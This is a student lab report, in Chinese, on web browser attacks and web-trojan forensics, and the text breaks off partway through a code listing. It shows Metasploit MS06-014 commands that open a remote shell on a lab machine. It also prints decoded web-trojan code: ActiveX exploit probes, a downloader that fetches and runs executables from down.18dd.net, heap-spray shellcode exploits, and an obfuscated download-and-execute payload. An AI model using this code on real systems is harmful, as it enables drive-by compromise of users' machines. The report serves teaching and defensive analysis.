1. 程式人生 > 其它 >20212813 2021-2022-2 《網路攻防實踐》實踐十一報告

20212813 2021-2022-2 《網路攻防實踐》實踐十一報告

一、實踐內容

1、Web瀏覽器的技術發展與安全威脅

1.1 Web瀏覽器戰爭與技術發展

Web瀏覽器是目前網際網路使用者最常用的客戶端軟體,可以幫助使用者瀏覽Web伺服器上的檔案,並讓使用者與這些檔案進行互動,在Web瀏覽器的幫助下,網際網路使用者能夠迅速及輕易地瀏覽全球資訊網上文字、影象、視訊等各種形態的資訊內容,以及訪問各種形式與用途的Web應用程式。
現代Web瀏覽器的基本結構:需要支援各種應用層協議的Stream流接收與解析,並維護DOM物件模型結構,通過支援EMCScript標準構建JavaScript、Flash ActionScript等客戶端指令碼語言的執行環境,以及支援CSS標準頁面的佈局,最終在瀏覽器終端中將伺服器端的各種流媒體物件、應用程式、客戶端指令碼執行效果進行渲染,展現給終端使用者

1.2 Web瀏覽的安全問題與威脅

Web瀏覽器軟體的安全困境三要素:

  •     複雜性:現代Web瀏覽器軟體由於需要支援多型別的應用層協議瀏覽,符合一系列的頁面標準規範,支援多種客戶端執行環境,並滿足大量的使用者瀏覽需求,已經變得非常複雜和龐大。現代瀏覽器軟體的複雜性意味著更多的錯誤和安全缺陷,也就導致了目前瀏覽器軟體中存在著可被滲透攻擊所利用的大量安全漏洞。
    
  •     可擴充套件性:現代Web瀏覽器可能是最突出可擴充套件特性支援的軟體型別,目前幾乎所有的現代瀏覽器軟體都支援第三方外掛擴充套件機制,並通過JavaScript等客戶端指令碼執行環境、沙箱和虛擬機器來執行富Internet應用程式。
    
  •     連通性:瀏覽器軟體始終工作在聯網狀態,一旦其中存在安全漏洞,就很容易被網路上的威脅源所利用與攻擊。
    

Web瀏覽安全威脅位置

  •     針對傳輸網路的網路安全協議安全威脅
    
  •     針對Web端系統平臺的安全威脅
    
  •     針對Web瀏覽器軟體及外掛程式的滲透攻擊威脅
    
  •     針對網際網路使用者的社會工程學攻擊威脅
    

2、網頁木馬的機理分析

網頁木馬從本質特性上是利用了現代Web瀏覽器軟體中所支援的客戶端指令碼執行能力,針對Web瀏覽端軟體安全漏洞實施客戶端滲透攻擊,從而取得在客戶端主機的遠端程式碼執行許可權來植入惡意程式。從根本上來說,網頁木馬是針對Web瀏覽端軟體實施的客戶端滲透攻擊程式碼。

網頁掛馬機制

(1)為使得能夠有終端使用者使用可能存在安全漏洞的Web瀏覽端軟體來訪問網頁木馬,攻擊者還需要將網頁木馬掛接到一些擁有客戶訪問流量的網站頁面上
(2)網頁掛馬四策略:

  •     內嵌HTML標籤:使用內嵌HTML標籤,將網頁木馬連結嵌入到網站首頁或其他頁面中
    
  •     惡意Script指令碼:利用script指令碼標籤通過外部引用指令碼的方式來包含網頁木馬
    
  •     內嵌物件連結:利用圖片、Flash等內嵌物件中的特定方法來完成指定頁面的載入
    
  •     ARP欺騙掛馬:在以上三類網站掛馬策略基礎上,危害更高的策略
    

網頁木馬防範措施

  • 提升作業系統與瀏覽器軟體的安全性,如第三方外掛自動更新
    
  • 安裝反病毒軟體
    
  • 養成良好的瀏覽習慣,藉助安全評估工具的幫助,避免訪問安全性低的網站
    

二、實踐過程

(一)web瀏覽器滲透攻擊

任務:使用攻擊機和Windows靶機進行瀏覽器滲透攻擊實驗,體驗網頁木馬構造及實施瀏覽器攻擊的實際過程。

實驗步驟:

①選擇使用Metasploit中的MS06-014滲透攻擊模組

②選擇PAYLOAD為任意遠端Shell連線

③設定伺服器地址和URL引數,執行exploit,構造出惡意網頁木馬指令碼

④在靶機環境中啟動瀏覽器,驗證與伺服器的連通性,並訪問而已網頁木馬指令碼URL

⑤在攻擊機的Metasploit軟體中檢視滲透攻擊狀態,並通過成功滲透攻擊後建立起的遠端控制會話SESSION,在靶機上遠端執行命令

首先檢視攻擊機和靶機的IP地址,然後測試攻擊機和靶機的連通性:


在Kali上使用sudo msfconsole 開啟Metasploit:

search MS06-014搜尋MS06-014漏洞並使用use exploit/windows/browser/ie_createobject:

set payload windows/shell/bind_tcp載入使用的payload,show options檢視其他設定,然後進行exploit,生成http://192.168.13.8:8080/zZrNUGhI

靶機使用瀏覽器訪問該URL:

此時攻擊機便得到一個會話,輸入session -i 1選擇會話1,返回shell:

(二)取證分析實踐—網頁木馬攻擊場景分析

實踐過程:

  • ①首先你應該訪問start.html,在這個檔案中給出了new09.htm的地址,
    
  • ②在進入 htm 後,每解密出一個檔案地址,請對其作 32 位 MD5 雜湊,以雜湊值為檔名到 http://192.168.68.253/scom/hashed/ 雜湊值下去下載對應的檔案(注意:檔名中的英文字母為小寫,且沒有副檔名),即為解密出的地址對應的檔案。
    
  • ③如果解密出的地址給出的是網頁或指令碼檔案,請繼續解密。
    
  • ④如果解密出的地址是二進位制程式檔案,請進行靜態反彙編或動態除錯。
    
  • ⑤重複以上過程直到這些檔案被全部分析完成。
    

首先我們可以在start.html檔案(複製到記事本中開啟),搜尋“new09.htm”,能夠找到兩處:

從這兩處可以看出start.html檔案在引用new09.htm檔案時沒有寫絕對路徑,所以new09.htm檔案與start.html檔案在同一目錄下,檢視new09.htm:

<iframe width='0' height='0' src='http://aa.18dd.net/aa/kl.htm'></iframe> 
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1299644.js"></script> 

可以看到 new09.htm 檔案中,用iframe引用了一個 http://aa.18dd.net/aa/kl.htm 檔案,又用javascript引用了一個http://js.users.51.la/1299644.js檔案。對它們分別作MD5雜湊


之後去hashed資料夾下找到這兩個檔案,7f60672dcd6b5e90b6772545ee219bd3
23180a42a2ff1192150231b44ffdf3d3,分別用記事本開啟:


顯然後一個檔案中沒有什麼資訊,前一個檔案中的內容則使用了XXTEA+Base64的加密方法,其中可以看到加密金鑰就藏在倒數第三行中:

t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));
\x73\x63\x72\x69\x70\x74使用十六進位制轉字串的操作,即可得到金鑰script

使用該網站進行XXTEA+Base64解密:


<script>
eval("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x69\x6e\x69\x74\x28\x29\x7b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x29\x3b\x7d\x0d\x0a\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x6c\x6f\x61\x64\x20\x3d\x20\x69\x6e\x69\x74\x3b\x0d\x0a\x69\x66\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x27\x4f\x4b\x27\x29\x3d\x3d\x2d\x31\x29\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x65\x3b\x0d\x0a\x76\x61\x72\x20\x61\x64\x6f\x3d\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x22\x6f\x62\x6a\x65\x63\x74\x22\x29\x29\x3b\x0d\x0a\x61\x64\x6f\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x22\x63\x6c\x61\x73\x73\x69\x64\x22\x2c\x22\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\x22\x29\x3b\x0d\x0a\x76\x61\x72\x20\x61\x73\x3d\x61\x64\x6f\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d\x22\x2c\x22\x22\x29\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x65\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x0d\x0a\x76\x61\x72\x20\x65\x78\x70\x69\x72\x65\x73\x3d\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x0d\x0a\x65\x78\x70\x69\x72\x65\x73\x2e\x73\x65\x74\x54\x69\x6d\x65\x28\x65\x78\x70\x69\x72\x65\x73\x2e\x67\x65\x74\x54\x69\x6d\x65\x28\x29\x2b\x32\x34\x2a\x36\x30\x2a\x36\x30\x2a\x31\x30\x30\x30\x29\x3b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x3d\x27\x63\x65\x3d\x77\x69\x6e\x64\x6f\x77\x73\x78\x70\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d\x27\x2b\x65\x78\x70\x69\x72\x65\x73\x2e\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x0d\x0a\x69\x66\x28\x65\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x31\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x0d\x0a\x65\x6c\x73\x65\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x66\x3b\x76\x61\x72\x20\x73\x74\x6f\x72\x6d\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x66\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x66\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x62\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x67\x3b\x76\x61\x72\x20\x70\x70\x73\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x50\x4f\x57\x45\x52\x50\x4c\x41\x59\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65\x72\x43\x74\x72\x6c\x2e\x31\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x67\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x67\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x70\x70\x73\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x68\x3b\x76\x61\x72\x20\x6f\x62\x6a\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x68\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x68\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x6f\x62\x6a\x2e\x44\x6c\x6f\x61\x64\x44\x53\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x64\x6f\x77\x6e\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x2f\x62\x62\x2f\x62\x64\x2e\x63\x61\x62\x22\x2c\x20\x22\x62\x64\x2e\x65\x78\x65\x22\x2c\x20\x30\x29\x7d\x7d\x0d\x0a\x7d\x7d\x7d")
</script>

然後對引號內的十六進位制數進行轉字串的操作,便可以得到以下內容:

function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}

可以看到這個檔案利用到的應用程式漏洞有“Adodb.Stream”、“MPS.StormPlayer”、POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”,分別對應利用了微軟資料庫訪問物件、暴風影音、PPStream 和百度搜霸的漏洞。這些都是現在網路使用者使用非常頻繁的軟體。另外,這個檔案還引用三個 js 檔案和一個壓縮包(bd.cab,解開後是 bd.exe)。之後,,分別計算“http://aa.18dd.net/aa/1.js”、“http://aa.18dd.net/aa/b.js”、“http://aa.18dd.net/aa/pps.js”和“http://down.18dd.net/bb/bd.cab” 的md5值:

檔案 MD5值
http://aa.18dd.net/aa/1.js 5d7e9058a857aa2abee820d5473c5fa4
http://aa.18dd.net/aa/b.js 3870c28cc279d457746b3796a262f166
http://aa.18dd.net/aa/pps.js 5f0b8bf0385314dbe0e5ec95e6abedc2
http://down.18dd.net/bb/bd.cab 1c1d7b3539a617517c49eee4120783b2

依次開啟相應的檔案:

1、http://aa.18dd.net/aa/1.js (5d7e9058a857aa2abee820d5473c5fa4)

開啟相應的檔案之後能夠發現是十六進位制資料:

進行轉化之後可以得到:

var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open

("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close

();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}

該程式碼前面部分下載了一個 http://down.18dd.net/bb/014.exe 的可執行檔案,後面部分是對ADODB漏洞的繼續利用。

2、http://aa.18dd.net/aa/b.js (3870c28cc279d457746b3796a262f166 )

這裡使用了packed加密方法,可以在這個網站上進行解密,解密結果為:

var bigblock=unescape("%u9090%u9090");
var headersize=20;
var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace=headersize+shellcode.length;
while(bigblock.length<slackspace)bigblock+=bigblock;
fillblock=bigblock.substring(0,slackspace);
block=bigblock.substring(0,bigblock.length-slackspace);
while(block.length+slackspace<0x40000)block=block+block+fillblock;
memory=new Array();
for(x=0;x<300;x++)
  memory[x]=block+shellcode;
var buffer='';
while(buffer.length<4068)buffer+="\x0a\x0a\x0a\x0a";
storm.rawParse(buffer)

我們可以看到關鍵字shellcode,根據參考檔案,shellcode是一個下載器,因此需要尋找其中的URL,最後找到的結果為 http://down.18dd.net/bb/bf.exe 得到一個可執行檔案。

3、http://aa.18dd.net/aa/pps.js (5f0b8bf0385314dbe0e5ec95e6abedc2 )

這裡採用了八進位制加密方式,解密結果為:

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u62
2f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

同上一個解密方法一樣,可以得到可執行檔案http://down.18dd.net/bb/pps.exe

4、http://down.18dd.net/bb/bd.cab (1c1d7b3539a617517c49eee4120783b2 )

這是一個壓縮檔案,解壓縮可以得到一個叫bd.exe檔案。
此時我們便有了四個exe檔案,再將計算先前的三個檔案的md5值然後下載:

檔案 MD5值
http://down.18dd.net/bb/014.exe ca4e4a1730b0f69a9b94393d9443b979
http://down.18dd.net/bb/bf.exe 268cbd59fbed235f6cf6b41b92b03f8e
http://down.18dd.net/bb/pps.exe ff59b3b8961f502289c1b4df8c37e2a4


可以看到這四個檔案大小相同,進一步對檔案內容進行 MD5 雜湊計算:

MD5值完全一樣,因此可以知道這四個檔案內容完全相同。

使用超級巡警工具,檢視可執行檔案的加殼情況,發現用Delphi寫的:

W32Dasm軟體反彙編df.exe檔案,並檢視串式參考內容清單:

從上面我們可以做如下推斷:
1.從"goto try"":try""Alletdel.bat""cmd /c date ""cmd /c date 1981-01-12""del ""del %0"等這些字串中推斷,這個程式可能生成一個叫"Alletdel.bat"的批處理檔案,這個檔案中有一個標籤叫"try",批處理檔案會不斷的執行這個標籤下一行的命令,命令內容可能是判斷檔案存在性,更改系統日期,刪除某些檔案。

2.從":\AutoRun.inf""[AutoRun] open=""AutoRun.inf""shell\Auto\command="中,猜測這個程式可能在磁碟根目錄下生成自動執行的檔案,以求使用者不小心時啟動程式。

"advapi32.dll","drivers/klif.sys","\program files\internet explorer\IEXPLORE.EXE","IE 執行保護","IEXPLORE.EXE","Software\Microsoft\Windows\CurrentVersion\Poli"),"Kernel32.dll","SOFTWARE\Borland\Delphi\RTL" , "ChangeServiceConfig2A" , "ChangeServiceConfig2W" ,"QueryServiceConfig2A","QueryServiceConfig2W"

從中可以猜測程式要對IE、登錄檔、服務和系統檔案動手腳。

4."瑞星卡卡上網安全助手 - IE 防漏牆", "允許","允許執行"可以看出這個程式有一定的防系統保護軟體的能力。

5.可以看到有20個"http://down.18dd.net/kl/**.exe",這個程式要下載一堆木馬。

(三)攻防對抗實踐—web瀏覽器滲透攻擊攻防

攻擊方使用Metasploit構造出至少兩個不同Web瀏覽端軟體安全漏洞的滲透攻擊程式碼,並進行混淆處理之後組裝成一個URL,通過具有欺騙性的電子郵件傳送給防守方。

防守方對電子郵件中的掛馬連結進行提取、解混淆分析、嘗試恢復出滲透程式碼的原始形態,並分析這些滲透程式碼都是攻擊哪些Web瀏覽端軟體的哪些安全漏洞。

攻擊方

按照第一個實驗的步驟使用MS06-014漏洞生成URL,http://192.168.13.8:8080/v6Xlim2ZRBx1xk

然後將該URL偽裝成一封郵件傳送給防守方:

防守方

防守方接收到該郵件:

開啟其原始碼,可以看到中間使用了大量的空格、水平製表符和回車等,這樣能夠對關鍵指令做字串拼接處理,防止被防毒軟體發現:

使用工具將空格(0x20)、水平製表符(0x09)和回車(0x0a、0x0d)等刪掉:

可以得到完整程式碼如下:

<html><head><title></title>
<scriptlanguage="javascript">
functionpVcQptuXtURkI(o,n)
{varr=null;
	try{eval("r=o"+".C"+"re"+"ate"+"Ob"+"je"+"ct(n)")}
	catch(e){}
	if(!r)
	{try{eval("r=o"+".Cr"+"ea"+"teO"+"bj"+"ect(n,'')")}
	catch(e){}}if(!r)
	{try{eval("r=o"+".Cr"+"ea"+"teO"+"bj"+"ect(n,'','')")}catch(e){}}
	if(!r){try{eval("r=o"+".Ge"+"tOb"+"je"+"ct('',n)")}catch(e){}}
	if(!r){try{eval("r=o"+".Ge"+"tOb"+"ject(n,'')")}catch(e){}}
	if(!r){try{eval("r=o"+".Ge"+"tOb"+"ject(n)")}catch(e){}}
	return(r);}
functionKICnWOyGLGaPMnBBSTFqivHOpkic(a)
{vars=pVcQptuXtURkI(a,"W"+"Sc"+"ri"+"pt"+".S"+"he"+"ll");
varo=pVcQptuXtURkI(a,"A"+"DO"+"D"+"B.S"+"tr"+"eam");
vare=s.Environment("P"+"ro"+"ce"+"ss");
varurl=document.location+'/p'+'ay'+'lo'+'ad';varxml=null;
varbin=e.Item("T"+"E"+"M"+"P")+"\\ujOvdPBAnxoLeaHiExeg"+".e"+"xe";
vardat;try{xml=newXMLHttpRequest();}
catch(e){try{xml=newActiveXObject("Microsoft.XMLHTTP");}catch(e){xml=newActiveXObject("MSXML2.ServerXMLHTTP");}}
if(!xml){return(0);}
xml.open("GET",url,false);
xml.send(null);
dat=xml.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(dat);o.SaveToFile(bin,2);s.Run(bin,0);}
functionKgYOUdGGjoLHKdVQmjepXovpiiN()
{var i=0;
var t=newArray(
'{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'6'+'}',
'{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'0'+'}',
'{'+'7'+'F'+'5'+'B'+'7'+'F'+'6'+'3'+'-'+'F'+'0'+'6'+'F'+'-'+'4'+'3'+'3'+'1'+'-'+'8'+'A'+'2'+'6'+'-'+'3'+'3'+'9'+'E'+'0'+'3'+'C'+'0'+'A'+'E'+'3'+'D'+'}',
'{'+'6'+'e'+'3'+'2'+'0'+'7'+'0'+'a'+'-'+'7'+'6'+'6'+'d'+'-'+'4'+'e'+'e'+'6'+'-'+'8'+'7'+'9'+'c'+'-'+'d'+'c'+'1'+'f'+'a'+'9'+'1'+'d'+'2'+'f'+'c'+'3'+'}',
'{'+'6'+'4'+'1'+'4'+'5'+'1'+'2'+'B'+'-'+'B'+'9'+'7'+'8'+'-'+'4'+'5'+'1'+'D'+'-'+'A'+'0'+'D'+'8'+'-'+'F'+'C'+'F'+'D'+'F'+'3'+'3'+'E'+'8'+'3'+'3'+'C'+'}',
'{'+'0'+'6'+'7'+'2'+'3'+'E'+'0'+'9'+'-'+'F'+'4'+'C'+'2'+'-'+'4'+'3'+'c'+'8'+'-'+'8'+'3'+'5'+'8'+'-'+'0'+'9'+'F'+'C'+'D'+'1'+'D'+'B'+'0'+'7'+'6'+'6'+'}',
'{'+'6'+'3'+'9'+'F'+'7'+'2'+'5'+'F'+'-'+'1'+'B'+'2'+'D'+'-'+'4'+'8'+'3'+'1'+'-'+'A'+'9'+'F'+'D'+'-'+'8'+'7'+'4'+'8'+'4'+'7'+'6'+'8'+'2'+'0'+'1'+'0'+'}',
'{'+'B'+'A'+'0'+'1'+'8'+'5'+'9'+'9'+'-'+'1'+'D'+'B'+'3'+'-'+'4'+'4'+'f'+'9'+'-'+'8'+'3'+'B'+'4'+'-'+'4'+'6'+'1'+'4'+'5'+'4'+'C'+'8'+'4'+'B'+'F'+'8'+'}',
'{'+'D'+'0'+'C'+'0'+'7'+'D'+'5'+'6'+'-'+'7'+'C'+'6'+'9'+'-'+'4'+'3'+'F'+'1'+'-'+'B'+'4'+'A'+'0'+'-'+'2'+'5'+'F'+'5'+'A'+'1'+'1'+'F'+'A'+'B'+'1'+'9'+'}',
'{'+'E'+'8'+'C'+'C'+'C'+'D'+'D'+'F'+'-'+'C'+'A'+'2'+'8'+'-'+'4'+'9'+'6'+'b'+'-'+'B'+'0'+'5'+'0'+'-'+'6'+'C'+'0'+'7'+'C'+'9'+'6'+'2'+'4'+'7'+'6'+'B'+'}',
'{'+'A'+'B'+'9'+'B'+'C'+'E'+'D'+'D'+'-'+'E'+'C'+'7'+'E'+'-'+'4'+'7'+'E'+'1'+'-'+'9'+'3'+'2'+'2'+'-'+'D'+'4'+'A'+'2'+'1'+'0'+'6'+'1'+'7'+'1'+'1'+'6'+'}',
